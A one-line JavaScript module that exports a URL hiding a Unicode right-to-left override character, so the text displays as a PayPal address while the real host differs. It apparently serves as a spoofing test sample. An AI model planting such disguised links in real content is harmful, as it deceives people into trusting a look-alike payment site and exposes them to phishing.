export default "https://‮moc.llaypap/verify\n"